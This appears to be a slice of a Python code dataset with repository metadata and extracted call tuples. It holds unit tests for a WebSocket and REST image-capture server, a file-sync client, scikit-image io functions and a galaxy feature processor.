({(208, 17, 208, 23): 'logger', (208, 25, 208, 31): 'result'}, {}), '(logger, result)', False, 'from internal import store_result\n'), ((230, 10, 230, 67), 'tools.kube_utils.get_pod_with_labels', 'get_pod_with_labels', ({(230, 30, 230, 66): '"""application=nova,component=compute"""'}, {}), "('application=nova,component=compute')", False, 'from tools.kube_utils import kube_exec, get_pod_with_labels\n'), ((233, 15, 233, 34), 'tools.kube_utils.kube_exec', 'kube_exec', ({(233, 25, 233, 28): 'pod', (233, 30, 233, 33): 'cmd'}, {}), '(pod, cmd)', False, 'from tools.kube_utils import kube_exec, get_pod_with_labels\n'), ((250, 18, 250, 55), 'tools.conf.settings.getValue', 'settings.getValue', ({(250, 36, 250, 54): '"""WORKER_ROLE_NAME"""'}, {}), "('WORKER_ROLE_NAME')", False, 'from tools.conf import settings\n'), ((282, 18, 282, 55), 'tools.conf.settings.getValue', 'settings.getValue', ({(282, 36, 282, 54): '"""WORKER_ROLE_NAME"""'}, {}), "('WORKER_ROLE_NAME')", False, 'from tools.conf import settings\n'), ((298, 14, 298, 91), 'tools.kube_utils.get_pod_with_labels', 'get_pod_with_labels', ({(298, 34, 298, 90): '"""application=openvswitch,component=openvswitch-vswitchd"""'}, {}), "('application=openvswitch,component=openvswitch-vswitchd')", False, 'from tools.kube_utils import kube_exec, get_pod_with_labels\n'), ((301, 15, 301, 38), 'tools.kube_utils.kube_exec', 'kube_exec', ({(301, 25, 301, 32): 'ovs_pod', (301, 34, 301, 37): 'cmd'}, {}), '(ovs_pod, cmd)', False, 'from tools.kube_utils import kube_exec, get_pod_with_labels\n'), ((304, 12, 304, 50), 're.findall', 're.findall', ({(304, 23, 304, 39): '"""[a-zA-Z0-9-]+="""', (304, 41, 304, 49): 'response'}, {}), "('[a-zA-Z0-9-]+=', response)", False, 'import re\n'), ((307, 12, 307, 50), 're.findall', 're.findall', ({(307, 23, 307, 39): '""":[a-zA-Z0-9-]+"""', (307, 41, 307, 49): 'response'}, {}), "(':[a-zA-Z0-9-]+', response)", False, 'import re\n'), ((311, 13, 311, 33), 'json.loads', 'json.loads', ({(311, 24, 311, 32): 'response'}, {}), '(response)', False, 'import json\n'), ((328, 18, 328, 55), 'tools.conf.settings.getValue', 'settings.getValue', ({(328, 36, 328, 54): '"""WORKER_ROLE_NAME"""'}, {}), "('WORKER_ROLE_NAME')", False, 'from tools.conf import settings\n'), ((344, 14, 344, 91), 'tools.kube_utils.get_pod_with_labels', 'get_pod_with_labels', ({(344, 34, 344, 90): '"""application=openvswitch,component=openvswitch-vswitchd"""'}, {}), "('application=openvswitch,component=openvswitch-vswitchd')", False, 'from tools.kube_utils import kube_exec, get_pod_with_labels\n'), ((347, 15, 347, 38), 'tools.kube_utils.kube_exec', 'kube_exec', ({(347, 25, 347, 32): 'ovs_pod', (347, 34, 347, 37): 'cmd'}, {}), '(ovs_pod, cmd)', False, 'from tools.kube_utils import kube_exec, get_pod_with_labels\n'), ((350, 12, 350, 50), 're.findall', 're.findall', ({(350, 23, 350, 39): '"""[a-zA-Z0-9-]+="""', (350, 41, 350, 49): 'response'}, {}), "('[a-zA-Z0-9-]+=', response)", False, 'import re\n'), ((353, 12, 353, 50), 're.findall', 're.findall', ({(353, 23, 353, 39): '""":[a-zA-Z0-9-]+"""', (353, 41, 353, 49): 'response'}, {}), "(':[a-zA-Z0-9-]+', response)", False, 'import re\n'), ((357, 13, 357, 33), 'json.loads', 'json.loads', ({(357, 24, 357, 32): 'response'}, {}), '(response)', False, 'import json\n'), ((374, 18, 374, 55), 'tools.conf.settings.getValue', 'settings.getValue', ({(374, 36, 374, 54): '"""WORKER_ROLE_NAME"""'}, {}), "('WORKER_ROLE_NAME')", False, 'from tools.conf import settings\n'), ((391, 18, 391, 55), 'tools.conf.settings.getValue', 'settings.getValue', ({(391, 36, 391, 54): '"""WORKER_ROLE_NAME"""'}, {}), "('WORKER_ROLE_NAME')", False, 'from tools.conf import settings\n'), ((416, 18, 416, 55), 'tools.conf.settings.getValue', 'settings.getValue', ({(416, 36, 416, 54): '"""WORKER_ROLE_NAME"""'}, {}), "('WORKER_ROLE_NAME')", False, 'from tools.conf import settings\n'), ((446, 10, 446, 39), 'tools.conf.settings.getValue', 'settings.getValue', ({(446, 28, 446, 38): '"""pdf_file"""'}, {}), "('pdf_file')", False, 'from tools.conf import settings\n'), ((479, 10, 479, 39), 'tools.conf.settings.getValue', 'settings.getValue', ({(479, 28, 479, 38): '"""pdf_file"""'}, {}), "('pdf_file')", False, 'from tools.conf import settings\n'), ((576, 10, 576, 67), 'tools.kube_utils.get_pod_with_labels', 'get_pod_with_labels', ({(576, 30, 576, 66): '"""application=nova,component=compute"""'}, {}), "('application=nova,component=compute')", False, 'from tools.kube_utils import kube_exec, get_pod_with_labels\n'), ((579, 15, 579, 34), 'tools.kube_utils.kube_exec', 'kube_exec', ({(579, 25, 579, 28): 'pod', (579, 30, 579, 33): 'cmd'}, {}), '(pod, cmd)', False, 'from tools.kube_utils import kube_exec, get_pod_with_labels\n'), ((581, 13, 581, 40), 'configparser.ConfigParser', 'configparser.ConfigParser', ({}, {}), '()', False, 'import configparser\n'), ((494, 12, 494, 41), 'tools.conf.settings.getValue', 'settings.getValue', ({(494, 30, 494, 40): '"""pdf_file"""'}, {}), "('pdf_file')", False, 'from tools.conf import settings\n'), ((507, 24, 507, 53), 'tools.conf.settings.getValue', 'settings.getValue', ({(507, 42, 507, 52): '"""pdf_file"""'}, {}), "('pdf_file')", False, 'from tools.conf import settings\n'), ((519, 25, 519, 54), 'tools.conf.settings.getValue', 'settings.getValue', ({(519, 43, 519, 53): '"""pdf_file"""'}, {}), "('pdf_file')", False, 'from tools.conf import settings\n'), ((542, 24, 542, 53), 'tools.conf.settings.getValue', 'settings.getValue', ({(542, 42, 542, 52): '"""pdf_file"""'}, {}), "('pdf_file')", False, 'from tools.conf import settings\n')]
juhnowski/FishingRod
production/pygsl-0.9.5/testing/__init__.py
457e7afb5cab424296dff95e1acf10ebf70d32a9
""" Here you find either new implemented modules or alternate implementations of already modules. This directory is intended to have a second implementation beside the main implementation to have a discussion which implementation to favor on the long run. """
[]
Cyberlightning/2D-3DCapture
PythonServer/UnitTestCasesForWebSocket.py
e5fdcec4f25358fc1964068180e4e774f45daa8a
''' Created on Mar 6, 2014 @author: tharanga ''' import unittest from time import sleep import EventService as es from EventService import WebSocketServer as ws from EventService import EventManager as em import socket from base64 import b64encode import struct import MySQLdb import json import EventService import flaskr import tempfile def encodeMessage( message): message = b64encode(message) b1 =0x80 | 0x1 & 0x0f b2 = 0 header="" payload_len = len(message) if payload_len < 126 : header = struct.pack('>BB', b1, payload_len) message= header +message elif (payload_len < ((2 ** 16) - 1)): b2 |= 126 header += chr(b1) header += chr(b2) l = struct.pack(">H", payload_len) header += l message = header +message else: b2 |= 127 header += chr(b1) header += chr(b2) l = struct.pack(">Q", payload_len) header += l message = header +message return message class TestWebSockets(unittest.TestCase): def setUp(self): self.wsServer = ws('',12345,'127.0.0.1') self.wsServer.setRunning(True); sleep(1) self.testsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.testsocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # Create a socket object host = 'localhost' # Get local machine name port = 12345 self.testsocket.connect((host, port)) def tearDown(self): self.wsServer.closeConnection(); self.testsocket.close() sleep(1) def test_webSocketServerOBject(self): self.assertEqual(self.wsServer.SERVER, '', "Server set to the desired value") self.assertEqual(self.wsServer.PORT, 12345, "Server port is set correctly") self.assertEqual(self.wsServer.LOCALHOST, "127.0.0.1", "Localhost set to 127.0.0.1") def test_invalid_Request(self): message= "Test Message" self.testsocket.send(message) data = repr(self.testsocket.recv(1024)) #print 'Response to invalid message<TestMessage> %s'%(data) self.assertEqual(data, '\'CONNECTION_REJECTED\'', "Invalid Message rejected") def test_valid_WS_Request(self): message = "GET /mychat HTTP/1.1\nHost: server.example.com\nUpgrade: websocket\nConnection: Upgrade\nSec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==\nSec-WebSocket-Protocol: chat\nSec-WebSocket-Version: 13\nOrigin: localhost\n\n" # message = "Test message" self.testsocket.sendall(message) wsresponse = repr(self.testsocket.recv(1024)) #print 'Response to valid ws request %s'%wsresponse self.assertNotEqual(wsresponse, '\'CONNECTION_REJECTED\'', "Connection is not rejected") self.assertIsNotNone(wsresponse, "Connection Response is not Empty") self.testsocket.sendall(("Test Message")) data = repr(self.testsocket.recv(1024)) #print 'Response to un encoded Request %s'%(data) self.assertEqual(data, "\'Un expected opcode\'", "In valid Message rejected") def test_invalid_Messge(self): message = "GET /mychat HTTP/1.1\nHost: server.example.com\nUpgrade: websocket\nConnection: Upgrade\nSec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==\nSec-WebSocket-Protocol: chat\nSec-WebSocket-Version: 13\nOrigin: localhost\n\n" self.testsocket.sendall(message) wsresponse = repr(self.testsocket.recv(1024)) sleep(1) self.testsocket.sendall("Test Message") data = repr(self.testsocket.recv(1024)) self.assertEqual(data, "\'Un expected opcode\'", "In valid Message rejected") def test_malformed_Message(self): message = "GET /mychat HTTP/1.1\nHost: server.example.com\nUpgrade: websocket\nConnection: Upgrade\nSec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==\nSec-WebSocket-Protocol: chat\nSec-WebSocket-Version: 13\nOrigin: localhost\n\n" self.testsocket.sendall(message) wsresponse = repr(self.testsocket.recv(1024)) # print wsresponse self.testsocket.send(encodeMessage("Test Message"))#This line seems to get stuck at times. Solution is to use sendAll, use \n at the end data = repr(self.testsocket.recv(1024)) self.assertEqual(data, "\'MISFORMATED MESSAGE\'", "Messages with out a type is rejected") def test_wellformed_Message_for_Text(self): message = "GET /mychat HTTP/1.1\nHost: server.example.com\nUpgrade: websocket\nConnection: Upgrade\nSec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==\nSec-WebSocket-Protocol: chat\nSec-WebSocket-Version: 13\nOrigin: localhost\n\n" self.testsocket.sendall(message) wsresponse = repr(self.testsocket.recv(1024)) # print wsresponse self.testsocket.send(encodeMessage("1<---->Test Message"))#This line seems to get stuck at times. Solution is to use sendAll, use \n at the end data = repr(self.testsocket.recv(1024)) print data self.assertEqual(data, "\'Text received\'", "Text Messages is identified and accepted") def test_wellformed_Message_for_Json(self): message = "GET /mychat HTTP/1.1\nHost: server.example.com\nUpgrade: websocket\nConnection: Upgrade\nSec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==\nSec-WebSocket-Protocol: chat\nSec-WebSocket-Version: 13\nOrigin: localhost\n\n" self.testsocket.sendall(message) wsresponse = repr(self.testsocket.recv(1024)) self.testsocket.send(encodeMessage("2<---->Test Message"))#This line seems to get stuck at times. Solution is to use sendAll, use \n at the end data = repr(self.testsocket.recv(1024)) # print data self.assertEqual(data, "\'json is received\'", "json Messages is identified and accepted") ##TO RUN THE FOLLOWING UNIT TESTS IT IS EXPECTED HAVE THE DATABASE ##CREATED. DATABASE SCRIPT IS PROVIDED TO CREATE THE NECESSARY DATABASES AND TABLES ##ASSISCIATED DATA IS NOT PROVIDED. class TestDatabase(unittest.TestCase): def setUp(self): self.connection = es.dbConnect() def tearDown(self): self.connection.close() def test_data_insert_data_Read(self): self.assertIsInstance(self.connection, MySQLdb.connection, "Database connection accurately set") jsondata ={"type":"image", "time":"2014.3.4_14.40.30", "ext":"png", "deviceType":"Mobile", "deviceOS":"Badda", "browsertype":"Firefox", "position":{"lon":25.4583105, "lat":65.0600797, "alt":-1000, "acc":48.38800048828125}, "device":{"ax":0, "ay":0, "az":0, "gx":0, "gy":0, "gz":0, "ra":210.5637, "rb":47.5657, "rg":6.9698, "orientation":"potrait"}, "vwidth":480, "vheight":800} alt = str(jsondata["position"]["alt"]); if alt=="None": alt = '0' heading = '0' speed = '0' width = jsondata["vwidth"] height =jsondata["vheight"] if width > height : screenorientation= 1.00#landscape else : screenorientation= 0.00#potrait filename = jsondata["type"]+"_"+jsondata["time"]+"."+jsondata["ext"] sqlstring1 = "INSERT INTO Imagedata values (\'"+filename+"\',GeomFromText ('POINT("+ str(jsondata["position"]["lat"])+" "+str(jsondata["position"]["lon"])+")'),"+str(jsondata["position"]["alt"])+","+str(jsondata["position"]["acc"]) sqlstring2 =","+str(jsondata["device"]["gx"])+","+str(jsondata["device"]["gy"])+","+str(jsondata["device"]["gz"]) sqlstring3 = ","+str(jsondata["device"]["ra"])+","+str(jsondata["device"]["rb"])+","+str(jsondata["device"]["rg"])+","+str(screenorientation)+",\'"+jsondata["device"]["orientation"]+"\',now(),\'"+str(jsondata["deviceOS"])+"\',\'"+str(jsondata["browsertype"])+"\',\'"+str(jsondata["deviceType"])+"\');" sqlstring = sqlstring1 + sqlstring2+ sqlstring3 #print(sqlstring) es.dbInsert(sqlstring) sqlreadsting = 'select imagename, Browser,devicetype,X(location) as latitude, Y(location) as longitude from Imagedata where time=\'2014.3.4_14.40.31\'' result = es.dbRead(sqlreadsting) self.assertIsNotNone(result, "Inserted data is retrieved and it is not null") for row in result: self.assertEqual(row[0], "image_2014.3.4_14.40.30.png", "Image name is correctly set and saved") self.assertEqual(row[1], 65.0600797, "Latitudes are saved") self.assertEqual(row[2], 25.4583105, "Longitude are saved") HOST = '127.0.0.1' # The remote host PORT = 17322 class RestServerTestCase(unittest.TestCase): def setUp(self): self.db_fd, flaskr.app.config['DATABASE'] = tempfile.mkstemp() EventService.app.config['TESTING'] = True self.app = EventService.app.test_client() flaskr.init_db() #self.socketServer = self.app.WebSocketServer('',wsport,'127.0.0.1') def test_rootpath(self): rv = self.app.get('/') assert 'This is a REST Service for 2D3DCapture Server.' in rv.data def test_post_image(self): rv = self.app.post('/postImage') assert 'READY' in rv.data def test_clossing_websocket(self): rv =self.app.post('/closewebsocketserver') assert 'CLOSED' or 'ALREADY_CLOSSED' in rv.data def test_start_websocket(self): rv =self.app.get('/startwebsocketserver') # print rv.data assert 'READY' in rv.data def test_post_binary_image(self): rv =self.app.post('/postBinaryImage') assert 'READY' or '415 Unsupported Media Type' in rv.data def test_get_All_Image_Data(self): rv =self.app.get('/getAllImageData') jsonmsg = json.loads(rv.data) self.assertIsNotNone(jsonmsg['imageList'] , "getImageData returns a non None list") def test_get_location_Image_Data(self): rv =self.app.get('/getLocationImageData?lat=65.0600797&lon=25.4583105') jsonmsg = json.loads(rv.data) self.assertIsNotNone(jsonmsg['imageList'] , "getLocationImageData returns a non None list.This is a feature test for location based image data") def test_closest_Image_retrieval(self): jsondata1 ={"type":"image", "time":"2014.3.4_14.40.31", "ext":"png", "deviceType":"Mobile", "deviceOS":"Badda", "browsertype":"Firefox", "position":{"lon":25.4583105, "lat":65.0600797, "alt":-1000, "acc":48.38800048828125}, "device":{"ax":0, "ay":0, "az":0, "gx":0, "gy":0, "gz":0, "ra":210.5637, "rb":47.5657, "rg":6.9698, "orientation":"potrait"}, "vwidth":480, "vheight":800} jsondata2 ={"type":"image", "time":"2014.3.4_14.40.32", "ext":"png", "deviceType":"Mobile", "deviceOS":"Badda", "browsertype":"Firefox", "position":{"lon":25.4582115, "lat":65.0600797, "alt":-1000, "acc":48.38800048828125}, "device":{"ax":0, "ay":0, "az":0, "gx":0, "gy":0, "gz":0, "ra":210.5637, "rb":47.5657, "rg":6.9698, "orientation":"potrait"}, "vwidth":480, "vheight":800} jsondata3 ={"type":"image", "time":"2014.3.4_14.40.33", "ext":"png", "deviceType":"Mobile", "deviceOS":"Badda", "browsertype":"Firefox", "position":{"lon":25.4584104, "lat":65.0600797, "alt":-1000, "acc":48.38800048828125}, "device":{"ax":0, "ay":0, "az":0, "gx":0, "gy":0, "gz":0, "ra":210.5637, "rb":47.5657, "rg":6.9698, "orientation":"potrait"}, "vwidth":480, "vheight":800} jsondata4 ={"type":"image", "time":"2014.3.4_14.40.34", "ext":"png", "deviceType":"Mobile", "deviceOS":"Badda", "browsertype":"Firefox", "position":{"lon":25.4586115, "lat":65.0600797, "alt":-1000, "acc":48.38800048828125}, "device":{"ax":0, "ay":0, "az":0, "gx":0, "gy":0, "gz":0, "ra":210.5637, "rb":47.5657, "rg":6.9698, "orientation":"potrait"}, "vwidth":480, "vheight":800} jsondata5 ={"type":"image", "time":"2014.3.4_14.40.35", "ext":"png", "deviceType":"Mobile", "deviceOS":"Badda", "browsertype":"Firefox", "position":{"lon":25.4587125, "lat":65.0600797, "alt":-1000, "acc":48.38800048828125}, "device":{"ax":0, "ay":0, "az":0, "gx":0, "gy":0, "gz":0, "ra":210.5637, "rb":47.5657, "rg":6.9698, "orientation":"potrait"}, "vwidth":480, "vheight":800} jsondata6 ={"type":"image", "time":"2014.3.4_14.40.36", "ext":"png", "deviceType":"Mobile", "deviceOS":"Badda", "browsertype":"Firefox", "position":{"lon":25.4588125, "lat":65.0600797, "alt":-1000, "acc":48.38800048828125}, "device":{"ax":0, "ay":0, "az":0, "gx":0, "gy":0, "gz":0, "ra":210.5637, "rb":47.5657, "rg":6.9698, "orientation":"potrait"}, "vwidth":480, "vheight":800} es.saveData(jsondata1) es.saveData(jsondata2) es.saveData(jsondata3) es.saveData(jsondata4) es.saveData(jsondata5) es.saveData(jsondata6) radius = 0.0001 photoList = es.getClosestImages( 65.0601787, 25.4583107, radius ) self.assertEqual(len(photoList), 4, "Length of the list should be equal of the first test") for row in photoList: assert 'image_2014.3.4_14.40.32.png' or 'image_2014.3.4_14.40.31.png' in row[0] photoList2 = es.getClosestImages( 65.0601787, 25.4587107, radius ) self.assertEqual(len(photoList2), 2, "Length of the list should be equal of the second test") for row in photoList2: assert 'image_2014.3.4_14.40.34.png' or 'image_2014.3.4_14.40.35.png' in row[0] def suite(): testsuit =unittest.TestSuite() testsuit.addTest(TestWebSockets('test_webSocketServerOBject')) testsuit.addTest(TestWebSockets('test_valid_WS_Request')) testsuit.addTest(TestWebSockets('test_invalid_Messge')) testsuit.addTest(TestWebSockets('test_invalid_Request')) testsuit.addTest(TestWebSockets('test_malformed_Message')) testsuit.addTest(TestWebSockets('test_wellformed_Message_for_Text')) testsuit.addTest(TestWebSockets('test_wellformed_Message_for_Json')) testsuit.addTest(TestDatabase('test_data_insert_data_Read')) testsuit.addTest(RestServerTestCase('test_rootpath')) testsuit.addTest(RestServerTestCase('test_post_image')) testsuit.addTest(RestServerTestCase('test_start_websocket')) testsuit.addTest(RestServerTestCase('test_clossing_websocket')) testsuit.addTest(RestServerTestCase('test_post_binary_image')) testsuit.addTest(RestServerTestCase('test_get_All_Image_Data')) testsuit.addTest(RestServerTestCase('test_closest_Image_retrieval')) return testsuit suite = suite() runner = unittest.TextTestRunner(verbosity=3) runner.run(suite) # if __name__ == "__main__": # #import sys;sys.argv = ['', 'Test.testName'] # unittest.main()
[]
JulianSobott/OpenDrive
src/tests/client_side/test_main.py
0593c994c3bccccc4351557c42d13f3535b6b6c1
import os import threading import time import unittest from OpenDrive.client_side import file_changes_json as c_json from OpenDrive.client_side import interface from OpenDrive.client_side import main from OpenDrive.client_side import paths as client_paths from OpenDrive.server_side import paths as server_paths from tests.client_side.helper_client import h_register_dummy_user_device_client from tests.helper_all import h_client_routine, h_start_server_process, h_stop_server_process, \ h_clear_init_all_folders, h_create_empty class TestMain(unittest.TestCase): def setUp(self) -> None: h_clear_init_all_folders() self._server_process = h_start_server_process() self.folder1_abs_local_path = client_paths.normalize_path(client_paths.LOCAL_CLIENT_DATA, "folder1") h_create_empty(self.folder1_abs_local_path) main.MIN_UPDATE_PAUSE_TIME = 1 def tearDown(self) -> None: main.shutdown() h_stop_server_process(self._server_process) @h_client_routine(clear_folders=False) def putest_start_logged_in(self): user = h_register_dummy_user_device_client() main_thread = threading.Thread(target=main.start, daemon=True) main_thread.start() time.sleep(2) # wait till changes.json is created interface.add_sync_folder(self.folder1_abs_local_path, "folder1") expected_content = c_json.get_all_data() file_path = os.path.join(self.folder1_abs_local_path, "dummy.txt") with open(file_path, "w") as f: f.write("Hello World") time.sleep(5) # wait till synchronization finished expected_path = os.path.join(server_paths.get_users_root_folder(user.user_id), "folder1/dummy.txt") self.assertTrue(os.path.exists(expected_path), "dummy file is not pulled to server!") self.assertEqual(expected_content, c_json.get_all_data()) time.sleep(1) # wait till waiting...
[((29, 5, 29, 42), 'tests.helper_all.h_client_routine', 'h_client_routine', (), '', False, 'from tests.helper_all import h_client_routine, h_start_server_process, h_stop_server_process, h_clear_init_all_folders, h_create_empty\n'), ((19, 8, 19, 34), 'tests.helper_all.h_clear_init_all_folders', 'h_clear_init_all_folders', ({}, {}), '()', False, 'from tests.helper_all import h_client_routine, h_start_server_process, h_stop_server_process, h_clear_init_all_folders, h_create_empty\n'), ((20, 31, 20, 55), 'tests.helper_all.h_start_server_process', 'h_start_server_process', ({}, {}), '()', False, 'from tests.helper_all import h_client_routine, h_start_server_process, h_stop_server_process, h_clear_init_all_folders, h_create_empty\n'), ((21, 38, 21, 108), 'OpenDrive.client_side.paths.normalize_path', 'client_paths.normalize_path', ({(21, 66, 21, 96): 'client_paths.LOCAL_CLIENT_DATA', (21, 98, 21, 107): '"""folder1"""'}, {}), "(client_paths.LOCAL_CLIENT_DATA, 'folder1')", True, 'from OpenDrive.client_side import paths as client_paths\n'), ((22, 8, 22, 51), 'tests.helper_all.h_create_empty', 'h_create_empty', ({(22, 23, 22, 50): 'self.folder1_abs_local_path'}, {}), '(self.folder1_abs_local_path)', False, 'from tests.helper_all import h_client_routine, h_start_server_process, h_stop_server_process, h_clear_init_all_folders, h_create_empty\n'), ((26, 8, 26, 23), 'OpenDrive.client_side.main.shutdown', 'main.shutdown', ({}, {}), '()', False, 'from OpenDrive.client_side import main\n'), ((27, 8, 27, 51), 'tests.helper_all.h_stop_server_process', 'h_stop_server_process', ({(27, 30, 27, 50): 'self._server_process'}, {}), '(self._server_process)', False, 'from tests.helper_all import h_client_routine, h_start_server_process, h_stop_server_process, h_clear_init_all_folders, h_create_empty\n'), ((31, 15, 31, 52), 'tests.client_side.helper_client.h_register_dummy_user_device_client', 'h_register_dummy_user_device_client', ({}, {}), '()', False, 'from tests.client_side.helper_client import h_register_dummy_user_device_client\n'), ((32, 22, 32, 70), 'threading.Thread', 'threading.Thread', (), '', False, 'import threading\n'), ((34, 8, 34, 21), 'time.sleep', 'time.sleep', ({(34, 19, 34, 20): '(2)'}, {}), '(2)', False, 'import time\n'), ((36, 8, 36, 73), 'OpenDrive.client_side.interface.add_sync_folder', 'interface.add_sync_folder', ({(36, 34, 36, 61): 'self.folder1_abs_local_path', (36, 63, 36, 72): '"""folder1"""'}, {}), "(self.folder1_abs_local_path, 'folder1')", False, 'from OpenDrive.client_side import interface\n'), ((37, 27, 37, 48), 'OpenDrive.client_side.file_changes_json.get_all_data', 'c_json.get_all_data', ({}, {}), '()', True, 'from OpenDrive.client_side import file_changes_json as c_json\n'), ((38, 20, 38, 74), 'os.path.join', 'os.path.join', ({(38, 33, 38, 60): 'self.folder1_abs_local_path', (38, 62, 38, 73): '"""dummy.txt"""'}, {}), "(self.folder1_abs_local_path, 'dummy.txt')", False, 'import os\n'), ((41, 8, 41, 21), 'time.sleep', 'time.sleep', ({(41, 19, 41, 20): '(5)'}, {}), '(5)', False, 'import time\n'), ((45, 8, 45, 21), 'time.sleep', 'time.sleep', ({(45, 19, 45, 20): '(1)'}, {}), '(1)', False, 'import time\n'), ((42, 37, 42, 85), 'OpenDrive.server_side.paths.get_users_root_folder', 'server_paths.get_users_root_folder', ({(42, 72, 42, 84): 'user.user_id'}, {}), '(user.user_id)', True, 'from OpenDrive.server_side import paths as server_paths\n'), ((43, 24, 43, 53), 'os.path.exists', 'os.path.exists', ({(43, 39, 43, 52): 'expected_path'}, {}), '(expected_path)', False, 'import os\n'), ((44, 43, 44, 64), 'OpenDrive.client_side.file_changes_json.get_all_data', 'c_json.get_all_data', ({}, {}), '()', True, 'from OpenDrive.client_side import file_changes_json as c_json\n')]
oz90210/Pyto
site-packages/skimage/io/tests/test_io.py
59f185149b71e57e5debeb1c9a61a28739e81720
import os import numpy as np from skimage import io, data_dir from skimage._shared import testing from skimage._shared.testing import assert_array_equal one_by_one_jpeg = ( b'\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01' b'\x00\x01\x00\x00\xff\xdb\x00C\x00\x03\x02\x02\x02\x02' b'\x02\x03\x02\x02\x02\x03\x03\x03\x03\x04\x06\x04\x04' b'\x04\x04\x04\x08\x06\x06\x05\x06\t\x08\n\n\t\x08\t\t' b'\n\x0c\x0f\x0c\n\x0b\x0e\x0b\t\t\r\x11\r\x0e\x0f\x10' b'\x10\x11\x10\n\x0c\x12\x13\x12\x10\x13\x0f\x10\x10' b'\x10\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11' b'\x00\xff\xc4\x00\x14\x00\x01\x00\x00\x00\x00\x00\x00' b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\xff\xc4\x00' b'\x14\x10\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' b'\x00\x00\x00\x00\x00\x00\xff\xda\x00\x08\x01\x01\x00' b'\x00?\x00*\x9f\xff\xd9' ) def test_stack_basic(): x = np.arange(12).reshape(3, 4) io.push(x) assert_array_equal(io.pop(), x) def test_stack_non_array(): with testing.raises(ValueError): io.push([[1, 2, 3]]) def test_imread_file_url(): # tweak data path so that file URI works on both unix and windows. data_path = data_dir.lstrip(os.path.sep) data_path = data_path.replace(os.path.sep, '/') image_url = 'file:///{0}/camera.png'.format(data_path) image = io.imread(image_url) assert image.shape == (512, 512) def test_imread_http_url(httpserver): # httpserver is a fixture provided by pytest-localserver # https://bitbucket.org/pytest-dev/pytest-localserver/ httpserver.serve_content(one_by_one_jpeg) # it will serve anything you provide to it on its url. # we add a /test.jpg so that we can identify the content # by extension image = io.imread(httpserver.url + '/test.jpg' + '?' + 's' * 266) assert image.shape == (1, 1)
[((27, 4, 27, 14), 'skimage.io.push', 'io.push', ({(27, 12, 27, 13): 'x'}, {}), '(x)', False, 'from skimage import io, data_dir\n'), ((39, 16, 39, 44), 'skimage.data_dir.lstrip', 'data_dir.lstrip', ({(39, 32, 39, 43): 'os.path.sep'}, {}), '(os.path.sep)', False, 'from skimage import io, data_dir\n'), ((42, 12, 42, 32), 'skimage.io.imread', 'io.imread', ({(42, 22, 42, 31): 'image_url'}, {}), '(image_url)', False, 'from skimage import io, data_dir\n'), ((53, 12, 53, 69), 'skimage.io.imread', 'io.imread', ({(53, 22, 53, 68): "httpserver.url + '/test.jpg' + '?' + 's' * 266"}, {}), "(httpserver.url + '/test.jpg' + '?' + 's' * 266)", False, 'from skimage import io, data_dir\n'), ((29, 23, 29, 31), 'skimage.io.pop', 'io.pop', ({}, {}), '()', False, 'from skimage import io, data_dir\n'), ((33, 9, 33, 35), 'skimage._shared.testing.raises', 'testing.raises', ({(33, 24, 33, 34): 'ValueError'}, {}), '(ValueError)', False, 'from skimage._shared import testing\n'), ((34, 8, 34, 28), 'skimage.io.push', 'io.push', ({(34, 16, 34, 27): '[[1, 2, 3]]'}, {}), '([[1, 2, 3]])', False, 'from skimage import io, data_dir\n'), ((26, 8, 26, 21), 'numpy.arange', 'np.arange', ({(26, 18, 26, 20): '12'}, {}), '(12)', True, 'import numpy as np\n')]
EmilioCC/gti770-student-framework
tests/core/feature_extraction/test_galaxyProcessor.py
3cd72da8fe78c7ecfc26c9e688cbe1b7deee353a
#!/usr/bin/env python # -*- coding: utf-8 -*- import os import numpy as np from unittest import TestCase from core.feature_extraction.galaxy.galaxy_processor import GalaxyProcessor from commons.helpers.dataset.strategies.galaxy_dataset.label_strategy import GalaxyDataSetLabelStrategy from commons.helpers.dataset.context import Context class TestGalaxyProcessor(TestCase): def setUp(self): validation_size = 0.2 # Get the ground truth CSV file from script's parameters. self.galaxy_csv_file = os.environ["VIRTUAL_ENV"] + "/data/csv/galaxy/galaxy.csv" self.galaxy_images_path = os.environ["VIRTUAL_ENV"] + "/data/images/" # Create instance of data set loading strategies. galaxy_label_data_set_strategy = GalaxyDataSetLabelStrategy() # Set the context to galaxy label data set loading strategy. context = Context(galaxy_label_data_set_strategy) context.set_strategy(galaxy_label_data_set_strategy) self.label_dataset = context.load_dataset(csv_file=self.galaxy_csv_file, one_hot=False, validation_size=np.float32(validation_size)) def testGalaxyProcessor(self): # Process galaxies. galaxy_processor = GalaxyProcessor(self.galaxy_images_path) #features = galaxy_processor.process_galaxy(self.label_dataset)
[((20, 41, 20, 69), 'commons.helpers.dataset.strategies.galaxy_dataset.label_strategy.GalaxyDataSetLabelStrategy', 'GalaxyDataSetLabelStrategy', ({}, {}), '()', False, 'from commons.helpers.dataset.strategies.galaxy_dataset.label_strategy import GalaxyDataSetLabelStrategy\n'), ((23, 18, 23, 57), 'commons.helpers.dataset.context.Context', 'Context', ({(23, 26, 23, 56): 'galaxy_label_data_set_strategy'}, {}), '(galaxy_label_data_set_strategy)', False, 'from commons.helpers.dataset.context import Context\n'), ((31, 27, 31, 67), 'core.feature_extraction.galaxy.galaxy_processor.GalaxyProcessor', 'GalaxyProcessor', ({(31, 43, 31, 66): 'self.galaxy_images_path'}, {}), '(self.galaxy_images_path)', False, 'from core.feature_extraction.galaxy.galaxy_processor import GalaxyProcessor\n'), ((26, 61, 26, 88), 'numpy.float32', 'np.float32', ({(26, 72, 26, 87): 'validation_size'}, {}), '(validation_size)', True, 'import numpy as np\n')]
okchaty/django-country
country/management/commands/populate_countries.py
740bc25956dc1b87f44486538a62037e0bd0ac94
